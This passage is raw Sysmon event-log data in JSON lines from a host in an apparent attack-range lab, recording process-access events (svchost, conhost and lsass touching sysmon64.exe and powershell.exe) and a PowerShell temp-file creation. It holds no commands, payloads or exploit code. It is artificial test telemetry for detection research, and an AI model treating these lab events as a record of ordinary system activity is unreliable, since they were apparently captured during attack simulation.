C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.921\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.921","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.937\r\nProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nProcessId: 3396\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrz2jd0e.0fl.ps1\r\nCreationUtcTime: 2020-08-01 05:52:35.937","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.937","ProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrz2jd0e.0fl.ps1","CreationUtcTime":"2020-08-01 05:52:35.937","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.984\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.984","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.984\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.984","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
